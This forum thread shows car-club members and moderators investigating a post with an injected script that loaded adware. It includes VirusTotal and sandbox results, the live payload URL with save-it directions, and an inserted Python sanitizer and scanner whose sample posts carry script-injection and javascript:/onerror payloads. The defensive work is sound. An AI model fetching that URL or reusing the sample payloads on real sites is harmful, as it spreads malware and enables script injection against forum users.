Old 04-15-2021, 09:05 PM   #1
daniels740
Board Member
 
Join Date: May 2019
Location: South Florida
Default Thread is redirecting to virus!

DO NOT CLICK "NWV: 86-93 240 wagon shell." thread in wanted.

It redirects to a malicious webpage. Thank God I have Norton antivirus security that immediately blocked the webpage. No idea what virus it was trying to install but my Norton antivirus detected a "web attack," categorized under High severity. I'm going to not browse the forum until this is fixed
daniels740 is offline   Reply With Quote
Old 04-15-2021, 10:27 PM   #2
daniels740
Board Member
 
Join Date: May 2019
Location: South Florida
Default

Looks to be fixed. Any info on what this was and if this can occur more frequently? Scared the heck out of me.
daniels740 is offline   Reply With Quote
Old 04-16-2021, 06:18 PM   #3
boostdemon
creative mastermind
 
boostdemon's Avatar
 
Join Date: May 2002
Location: Cary, NC
Default

I suspect it's just a false positive on the way the images were hotlinked? Not sure, but there's really no way to redirect a thread link to a website.
__________________
"the best way to get the right answer on the internet is not to ask a question; it's to post the wrong answer."

1983 242 TIC Flathood
1986 745 GLE
1988 Toyota Pickup 4x4
2001 V70 T5
2001 V70 XC
2004 V70 R Flash Green
2004 V70 R Grey

"Flathood" Owners | Motorcyclists | Guitarists
boostdemon is offline   Reply With Quote
Old 04-16-2021, 06:30 PM   #4
daniels740
Board Member
 
Join Date: May 2019
Location: South Florida
Default

I dunno, but I at first ignored the "known malicious website" warning and proceeded, only for Norton to detect large suspicious traffic outgoing, and multiple web attacks following proceeding to wherever the link was taking me. It induced a bit of a panic.

The link it was redirecting to can be seen with a couple other details from Norton.


I have fairly fast internet, so it could be that it was taking me to the actual thread first but redirecting really fast. It seemed instant to me.
daniels740 is offline   Reply With Quote
Old 04-16-2021, 07:17 PM   #5
John242Ti
LH-Jet & Carb Free Zone
 
John242Ti's Avatar
 
Join Date: May 2003
Location: Duvall, WA
Default

I wonder if maybe you have malware on your PC somewhere. I've clicked the thread multiple times with no problems. Granted, I'm running a Mac and am using Firefox. So, if you have the Malwarebytes app on your computer, run a full scan and make sure that the hard drive is clean. Also, if you're running Microsoft Edge, I'd use Firefox instead.
__________________

1982 242Ti - black, M46. 1985 245Ti - blue, M46 - soon to be for sale.

@john242ti on IG
John242Ti is offline   Reply With Quote
Old 04-16-2021, 07:24 PM   #6
daniels740
Board Member
 
Join Date: May 2019
Location: South Florida
Default

Quote:
Originally Posted by John242Ti View Post
I wonder if maybe you have malware on your PC somewhere. I've clicked the thread multiple times with no problems. Granted, I'm running a Mac and am using Firefox. So, if you have the Malwarebytes app on your computer, run a full scan and make sure that the hard drive is clean. Also, if you're running Microsoft Edge, I'd use Firefox instead.
The link was fixed when JohnMc edited the post at 9:23pm yesterday and I've been able to view it with no issue since. I also completed all sorts of scans to be on the safe side yesterday and had no problem. The antivirus I pay for did its job. Maybe JohnMc can let us in on some details of what he fixed.
daniels740 is offline   Reply With Quote
Old 04-16-2021, 07:33 PM   #7
JohnMc
PV Abuser
 
JohnMc's Avatar
 
Join Date: May 2004
Location: St. Louis
Default

There was some JavaScript link in script tags - the 'nicoletto.com' shown in the screenshots above. I took that out. Not sure what it was supposed to be doing. I removed it.
__________________
'63 PV Rat Rod
'93 245 16VT Classic #1141
JohnMc is offline   Reply With Quote
Old 04-16-2021, 08:51 PM   #8
daniels740
Board Member
 
Join Date: May 2019
Location: South Florida
Default

I just hope nobody got a virus. When I proceeded to the webpage, it appeared to redirect me to a webpage that just wasn't available, no visible download or anything. If Norton hadn't detected and stopped the web attack, as well as informed me of suspicious outbound traffic, I would not have had a single clue that something was up.

I'd just advise that everyone get a good antivirus on their computer. It was apparent that this thing was trying to spread like wildfire to the other devices on my network, had Norton not blocked the outbound traffic.

Stay safe, guys.
daniels740 is offline   Reply With Quote
Old 04-19-2021, 06:57 PM   #9
daniels740
Board Member
 
Join Date: May 2019
Location: South Florida
Default

They've done it again. I wouldn't try to take a look at what's happening unless you have an antivirus you really trust.
daniels740 is offline   Reply With Quote
Old 04-19-2021, 07:16 PM   #10
2manyturbos
Moderator
 
Join Date: Mar 2003
Location: Monroe, OR USA
Default

I got the same warning with my Norton Antivirus software when I posted to the thread. I just deleted the thread. The OP can try again if he/she is legit.
2manyturbos is offline   Reply With Quote
Old 04-19-2021, 07:18 PM   #11
daniels740
Board Member
 
Join Date: May 2019
Location: South Florida
Default

I have done some problem solving and figured out what is happening. YOU GUYS ARE NOT SAFE!!!

Either OP is himself infected with a virus or he is trying to infect board members.

To stop the redirecting, I blocked JavaScript in Google for TB. That allowed me to visit the forum, to see that OP's latest post has a bit of JavaScript at the bottom that redirects to the malicious website.

I wanted to see if Firefox automatically blocks it, but NO, IT WILL ALLOW THE INTRUSION ATTEMPT.

More in detail, I visited the thread on Firefox, and it looked completely safe, only for Norton to need to block the intrusion attempt. Had Norton Antivirus not done this for me, I would have had no idea of the intrusion attempt when I used Firefox. It looked like I just visited the thread like normal.

I HIGHLY advise that we temporarily or perma-ban the OP.
daniels740 is offline   Reply With Quote
Old 04-19-2021, 07:19 PM   #12
daniels740
Board Member
 
Join Date: May 2019
Location: South Florida
Default

Quote:
Originally Posted by 2manyturbos View Post
I got the same warning with my Norton Antivirus software when I posted to the thread. I just deleted the thread. The OP can try again if he/she is legit.
I was just about to PM you because I saw you responded to the thread while it was redirecting. I am certain there are a couple of people on here who are infected with the virus and have no idea.
daniels740 is offline   Reply With Quote
Old 04-19-2021, 07:52 PM   #13
daniels740
Board Member
 
Join Date: May 2019
Location: South Florida
Default

To recap, there is a period of time when clicking on the thread (even if it appeared to load normally) allowed a web attack onto the user's computer, if they had JavaScript enabled and do not use a good antivirus.

SO, IF YOU VISITED THE THREAD "NWV: 86-93 240 wagon shell" in wanted:

FROM Original post time on 4/15/2021 TO Time edited ~9:25PM EST 4/15/2021
OR
FROM Second post by OP at ~5PM EST 4/19/2021 TO Time the thread was deleted 4/19/2021,

and nothing seemed out of the usual on your PC that has no antivirus, you likely have malware running on your PC. I have no idea what this web attack would have done to mobile devices, Macs, etc.

I cannot stress this enough, I advise that everyone has a good antivirus. It is worth the price.

Last edited by daniels740; 04-19-2021 at 08:21 PM..
daniels740 is offline   Reply With Quote
Old 04-19-2021, 09:57 PM   #14
MasterBlaster
Board Member
 
MasterBlaster's Avatar
 
Join Date: Feb 2009
Location: Port Coquitlam
Default

Running Puppy Linux with Chromium, so of course I clicked on it, got the source, and downloaded the referenced JavaScript file from nickletto.com.

Just for fun, I gave the .JS file to Virustotal.com to look at.
Copied most of the results here:


Ad-Aware - JS:Adware.Lnkr.E
AegisLab - Adware.Script.Generic.2!c
Arcabit - JS:Adware.Lnkr.E
Avast - Script:SNH-gen [Adw]
AVG - Script:SNH-gen [Adw]
BitDefender - JS:Adware.Lnkr.E
Comodo - Application.JS.AdWare.Revizer.E@8bp9s7
Cyren - JS/Revizer.A
DrWeb - JS.Siggen5.40409
Emsisoft - JS:Adware.Lnkr.E (B)
eScan - JS:Adware.Lnkr.E
FireEye - JS:Adware.Lnkr.E
GData - Script.Adware.Injector.OC
Kaspersky - Not-a-virus:HEUR:AdWare.Script.Generic
MAX - Malware (ai Score=64)
NANO-Antivirus - Trojan.Script.Adware.iestfp
Rising - Adware.Lnkr/JS!1.D2D0 (CLASSIC)
ZoneAlarm by Check Point - Not-a-virus:HEUR:AdWare.Script.Generic

-------------------------------------

When executing the file being studied, it performed the following actions on the registry of the sandbox environment.

Registry Actions

Registry Keys Set

HKLM\Software\Microsoft\WBEM\CIMOM\ConfigValueEssNeedsLoading
1

HKLM\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces
00 00 54 00 45 00 76 00 65 00 6E 00 74 00 4C 00 6F 00 67 00 45 00 76 00 65 00 6E 00 74 00 43 00 6F 00 6E 00 73 00 75 00 6D 00 65 00 72 00
\\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Time Zones\Greenland Standard Time\TZI

HKLM\SYSTEM\ControlSet001\Control\TimeZoneInformation\ActiveTimeBias
4294967176
\\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Time Zones\Iran Standard Time\TZI

HKLM\SYSTEM\ControlSet001\Control\BackupRestore\FilesNotToBackup\BITS_LOG
%windir%\System32\Bits.log

HKLM\SYSTEM\ControlSet001\Control\BackupRestore\FilesNotToBackup\BITS_BAK
%windir%\System32\Bits.bak

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS\StateIndex
1

HKLM\SOFTWARE\Microsoft\WBEM\PROVIDERS\Performance\Performance Refresh
0

HKLM\SOFTWARE\Microsoft\WBEM\PROVIDERS\Performance\Performance Refreshed
1

HKLM\SOFTWARE\Microsoft\WBEM\PROVIDERS\Performance\Performance Data
28 1B 00 00 01 00 00 00 00 00 00 00 10 00 00 00 18 1B 00 00 09 00 00 00 9A 00 00 00 01 00 00 00 01 00 00 00 40 00 00 00 1A 00 00 00 5C 00 5C 00 2E 00 5C 00 72 00 6F 00 6F 00 74 00 5C 00 77 00 6D 00 69 00 00 00 00 00 00 00 00 00 00 00 00 00 C0 01 00 00 04 00 00 00 08 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 64 00 00 00 68 00 00 00 3A 00 00 00 4D 00 53 00 69 00 53 00 43 00 53 00 49 00 5F 00 43 00 6F 00 6E 00 6E 00 65 00 63 00 74 00 69 00 6F 00 6E 00 53 00 74 00 61 00 74 00 69 00 73 00 74 00 69 00 63 00 73 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 1A 00 00 00 49 00 6E 00 73 00 74 00 61 00 6E 00 63 00 65 00 4E 00 61 00 6D 00 65 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 00 00 00 00 00 00 00 02 00 00 00 15 00 00 00 00 00 00 00 64 00 00 00 00 05 41 10 48 00 00 00 1C 00 00 00 42 00 79 00 74 00 65 00 73 00 52 00 65 00 63 00 65 00 69 00 76 00 65 00 64 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 15 00 00 00 00 00 00 00 64 00 00 00 00 05 41 10 40 00 00 00 14 00 00 00 42 0

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Last Counter
12642

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Last Help
12643

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Updating
\\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Time Zones\Paraguay Standard Time\TZI

HKLM\Software\Microsoft\WBEM\WDM\%windir%\system32\drivers\ndis.sys[MofResourceName]
LowDateTime:-1971493113,HighDateTime:30676308***Binary mof failed, see WMIPROV.LOG

HKLM\Software\Microsoft\WBEM\WDM\%windir%\System32\Drivers\portcls.SYS[PortclsMof]
LowDateTime:-1221632304,HighDateTime:30487028***Binary mof compiled successfully

HKLM\Software\Microsoft\WBEM\WDM\%windir%\system32\drivers\en-US\ACPI.sys.mui[ACPIMOFResource]
LowDateTime:-403062016,HighDateTime:30016570***Binary mof compiled successfully

HKLM\Software\Microsoft\WBEM\WDM\%windir%\system32\DRIVERS\HDAudBus.sys[HDAudioMofName]
LowDateTime:-1867536076,HighDateTime:30116016***Binary mof compiled successfully

HKLM\Software\Microsoft\WBEM\WDM\%windir%\System32\Drivers\en-US\portcls.SYS.mui[PortclsMof]
LowDateTime:-503062016,HighDateTime:30016570***Binary mof compiled successfully

HKLM\Software\Microsoft\WBEM\WDM\%windir%\system32\advapi32.dll[MofResourceName]
LowDateTime:-1337772912,HighDateTime:30778796***Binary mof compiled successfully

HKLM\Software\Microsoft\WBEM\WDM\%windir%\system32\en-US\advapi32.dll.mui[MofResourceName]
LowDateTime:-1270310445,HighDateTime:30778796***Binary mof compiled successfully

HKLM\Software\Microsoft\WBEM\WDM\%windir%\system32\drivers\en-US\mssmbios.sys.mui[MofResource]
LowDateTime:-143062016,HighDateTime:30016570***Binary mof compiled successfully

HKLM\Software\Microsoft\WBEM\WDM\%windir%\system32\DRIVERS\en-US\HDAudBus.sys.mui[HDAudioMofName]
LowDateTime:-2018029312,HighDateTime:30016571***Binary mof compiled successfully

HKLM\Software\Microsoft\WBEM\WDM\%windir%\system32\drivers\en-US\ndis.sys.mui[MofResourceName]
LowDateTime:-1258029312,HighDateTime:30016571***Binary mof failed, see WMIPROV.LOG

HKLM\Software\Microsoft\WBEM\WDM\%windir%\system32\DRIVERS\en-US\intelppm.sys.mui[PROCESSORWMI]
LowDateTime:2076937984,HighDateTime:30016571***Binary mof compiled successfully

HKLM\Software\Microsoft\WBEM\WDM\IDE\DiskAMDX_HARDDISK___________________________2.5+____\5&2770a7af&0&0.0.0_0-{05901221-D566-11d1-B2F0-00A0C9062910}
LowDateTime:803713417,HighDateTime:0***Binary mof compiled successfully

HKLM\Software\Microsoft\WBEM\WDM\%windir%\system32\DRIVERS\intelppm.sys[PROCESSORWMI]
LowDateTime:-2085707242,HighDateTime:30778791***Binary mof compiled successfully

HKLM\Software\Microsoft\WBEM\WDM\%windir%\system32\drivers\ACPI.sys[ACPIMOFResource]
LowDateTime:-1241494372,HighDateTime:30646958***Binary mof compiled successfully

HKLM\Software\Microsoft\WBEM\WDM\%windir%\system32\DRIVERS\monitor.sys[MonitorWMI]

HKLM\Software\Microsoft\WBEM\WDM\%windir%\system32\drivers\mssmbios.sys[MofResource]
LowDateTime:2004871927,HighDateTime:30733930***Binary mof compiled successfully

HKLM\SYSTEM\ControlSet001\Control\Nsi\{eb004a03-9b1a-11d4-9123-0050047759bc}\22\(Default)

HKLM\SYSTEM\ControlSet001\Control\Nsi\{eb004a03-9b1a-11d4-9123-0050047759bc}\24\ffffffffffffffffffffffffffffff00
00 00 00 00 00 00 00 00 00 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF

HKLM\SYSTEM\ControlSet001\Control\Nsi\{eb004a03-9b1a-11d4-9123-0050047759bc}\24\ffffffffffffffffffffffffffffff01
00 00 00 00 77 00 00 00 19 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF

HKLM\SYSTEM\ControlSet001\Control\Nsi\{eb004a03-9b1a-11d4-9123-0050047759bc}\24\ffffffffffffffffffffffffffffff02
01 00 00 00 5A 00 00 00 D6 17 00 00 FF FF FF FF FF FF FF FF FF FF FF FF

HKLM\SYSTEM\ControlSet001\Control\Nsi\{eb004a03-9b1a-11d4-9123-0050047759bc}\24\ffffffffffffffffffffffffffffff03
00 00 00 00 00 00 00 00 00 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF

HKLM\SYSTEM\ControlSet001\Services\BITS\Performance\PerfMMFileName
Global\MMF_BITS_s
\\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Time Zones\Middle East Standard Time\TZI

Registry Keys Deleted

HKLM\SYSTEM\ControlSet001\Services\WmiApRpl\Performance\First Counter
HKLM\SYSTEM\ControlSet001\Services\WmiApRpl\Performance\Last Counter
HKLM\SYSTEM\ControlSet001\Services\WmiApRpl\Performance\First Help
HKLM\SYSTEM\ControlSet001\Services\WmiApRpl\Performance\Last Help
HKLM\SYSTEM\ControlSet001\Services\WmiApRpl\Performance\Object List

Process And Service Actions

Processes Terminated

wmiadap.exe /F /T /R

Processes Tree

2992 - wmiadap.exe /F /T /R
2676 - wscript.exe %SAMPLEPATH%
3040 - %windir%\system32\wbem\wmiprvse.exe
__________________




1990 740GL
517,000 km so far...
MasterBlaster is offline   Reply With Quote
Old 04-19-2021, 10:13 PM   #15
daniels740
Board Member
 
Join Date: May 2019
Location: South Florida
Default

Although I'm not technologically literate enough to understand the full extent of the previous post, I wanted to know how you were able to find the nickletto file after the thread was deleted. Did you copy the link seen in my screenshots?

I wanted to know because I was looking into how the OP was redirecting the thread the way they were.

From research, I found out they can use a couple JavaScript codes that I will not be sharing to redirect to a different webpage. Although those codes worked using youtube.com as the new page in some testing I completed, I was not able to match the speed at which the poster with the actual virus was able to complete.

Therefore, I'd like to know if you can still view their original post because, in that case, I would like to see it too, to see the JavaScript code they were using in their post.
daniels740 is offline   Reply With Quote
Old 04-19-2021, 10:28 PM   #16
boostdemon
creative mastermind
 
boostdemon's Avatar
 
Join Date: May 2002
Location: Cary, NC
Default

Quote:
Originally Posted by MasterBlaster View Post
Running Puppy Linux with Chromium, so of course I clicked on it, got the source, and downloaded the referenced JavaScript file from nickletto.com.

Wow, good info, thanks!

If someone could tell me WHO the person is, I'll take care of it.

Last edited by boostdemon; 04-19-2021 at 10:34 PM..
boostdemon is offline   Reply With Quote
Old 04-20-2021, 01:04 AM   #17
MasterBlaster
Board Member
 
MasterBlaster's Avatar
 
Join Date: Feb 2009
Location: Port Coquitlam
Default

Quote:
Originally Posted by daniels740 View Post
I wanted to know how you were able to find the nickletto file after the thread was deleted.
I didn't. I saw you say "They've done it again." and off I went.

Opened the thread, viewed the source (Ctrl+U), found the nickletto link, and did a "Save link as..." to bring it on down.

Quote:
Originally Posted by daniels740 View Post
Therefore, I'd like to know if you can still view their original post because, in that case, I would like to see it too, to see the JavaScript code they were using in their post.
Can't see the post any more, as it's now an "Invalid link".
But here's a pretty little ZIP file with the post's source, as well as the JS file...

(Stay tuned... trying to get Google Drive to cooperate).

Screw it. Google sucks.
This is the link:
www.nickletto.com/2305aeaa4cd4bdad02.js
Right click, save the link as... whatever. 189Kb
No idea what happens if you directly click on it, so don't.

You can also easily find the link in the source file... just search for "nick".
It's just a single line injected at the end of the OP's reply.

Here's a nice safe picture of the line with the link:



Might know why I couldn't link the ZIP. Google Drive had it "Flagged for abuse". Maybe they're mad at me now.

Last edited by boostdemon; 04-24-2021 at 01:47 AM..
MasterBlaster is offline   Reply With Quote
Old 04-20-2021, 08:36 AM   #18
daniels740
Board Member
 
Join Date: May 2019
Location: South Florida
Default

Quote:
Originally Posted by MasterBlaster View Post
I didn't. I saw you say "They've done it again." and off I went...
That screenshot is exactly what I was looking for, thanks! Looks to me like they were able to redirect so quickly because they weren't redirecting to an external website that executed the file, they were executing the external JavaScript file itself.

Either way, I wanted to know if we can somehow disable external JavaScript files or commands to stop board members from doing things like this. I, myself, who never wrote a JavaScript command heretofore, was able to figure out how to redirect a thread immediately upon loading using JavaScript in a reply to a thread.

I'm sure you can see why this is a problem, so I'm thinking about if there's something we can do to stop misuse of JavaScript in the forums.
daniels740 is offline   Reply With Quote
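Post #17 shows how the payload was found (view source, search for the injected line) and post #18 asks whether external JavaScript in posts can be blocked. The following is an added example written for this thread, not the forum's or vBulletin's own code: a server-side allowlist sanitizer that strips script tags, event-handler attributes and javascript: URLs from a post before it is stored, plus a scanner that runs the "search the source" check over posts that are already in the database. The sample posts and the cdn.example.invalid host are constructed placeholders, not the thread's real content or URL.

```python
"""Added example (not vBulletin's HTML filter): allowlist sanitizer for
user-posted HTML, plus a scanner for script injections in stored posts.
Sample posts and the cdn.example.invalid host are constructed."""
from html import escape
from html.parser import HTMLParser
import re

# Markup a forum post legitimately needs; anything else is dropped.
ALLOWED_TAGS = {"b", "i", "u", "p", "br", "a", "img", "ul", "ol", "li",
                "blockquote", "code", "pre"}
ALLOWED_ATTRS = {"a": {"href"}, "img": {"src", "alt"}}
DROP_WITH_CONTENT = {"script", "style"}  # tag and its text both vanish
VOID_TAGS = {"br", "img"}


def safe_url(url: str) -> bool:
    """Allow only http(s) or site-relative URLs. An allowlist, not a denylist,
    so obfuscated 'javascript:' / 'data:' schemes fail by default."""
    u = url.strip().lower()
    return u.startswith(("http://", "https://")) or (
        u.startswith("/") and not u.startswith("//"))


class PostSanitizer(HTMLParser):
    """Re-emit only allowlisted tags/attributes; other tags become plain text."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0  # > 0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return  # unknown tag is dropped; its inner text is kept
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, ()) or value is None:
                continue  # this also silently removes on* event handlers
            if name in ("href", "src") and not safe_url(value):
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        if tag == "img" and not any(k.startswith(" src=") for k in kept):
            return  # an image without a safe source is useless; drop it
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))  # re-escape < > &


def sanitize_post(html: str) -> str:
    """Run user-supplied post HTML through the allowlist before storing it."""
    p = PostSanitizer()
    p.feed(html)
    p.close()
    return "".join(p.out)


# Detection side: the thread found the payload by viewing the page source and
# searching for the injected <script src=...> line. Same check, over stored posts.
SCRIPT_MARKERS = re.compile(
    r"(?P<script_tag><\s*script\b)|(?P<event_handler>\bon[a-z]+\s*=)"
    r"|(?P<js_url>javascript\s*:)", re.I)
SCRIPT_SRC = re.compile(r"<\s*script\b[^>]*\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)


def find_injected_scripts(posts):
    """Return {post_id: [marker kinds]} for posts carrying script-like markup."""
    flagged = {}
    for post_id, body in posts:
        kinds = {m.lastgroup for m in SCRIPT_MARKERS.finditer(body)}
        if kinds:
            flagged[post_id] = sorted(kinds)
    return flagged


def external_script_sources(body: str) -> list:
    """List the src= targets of any <script> tags, for reporting/blocklisting."""
    return SCRIPT_SRC.findall(body)


# Constructed sample posts (not the real thread's content or URL).
SAMPLE_POSTS = [
    (101, "Looking for an 86-93 240 wagon shell, <b>rust free</b> preferred."),
    (102, 'Still looking.<script src="http://cdn.example.invalid/2305.js"></script>'),
    (103, '<a href="javascript:alert(1)">pics</a> <img src="x" onerror="alert(1)">'),
]

if __name__ == "__main__":
    for post_id, body in SAMPLE_POSTS:
        print(post_id, "->", sanitize_post(body))
    print(find_injected_scripts(SAMPLE_POSTS))
    print(external_script_sources(SAMPLE_POSTS[1][1]))
```

The sanitizer is the fix for the root cause visible in this thread's posting rules ("HTML code is On"): with raw HTML allowed, a single line pasted at the end of a reply is served to every reader as the board's own script. Turning HTML posting off, or filtering as above, stops the injection at storage time; a Content-Security-Policy header restricting script-src to the board's own origin is a second layer that makes the browser refuse an external script even if a filter is bypassed. The scanner is the cleanup step: run it once over existing posts so a payload that was stored before the filter went in is found without someone having to click through and read page source.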
All times are GMT -4. The time now is 11:53 AM.

Powered by vBulletin® Version 3.8.11
Copyright ©2000 - 2021, vBulletin Solutions Inc.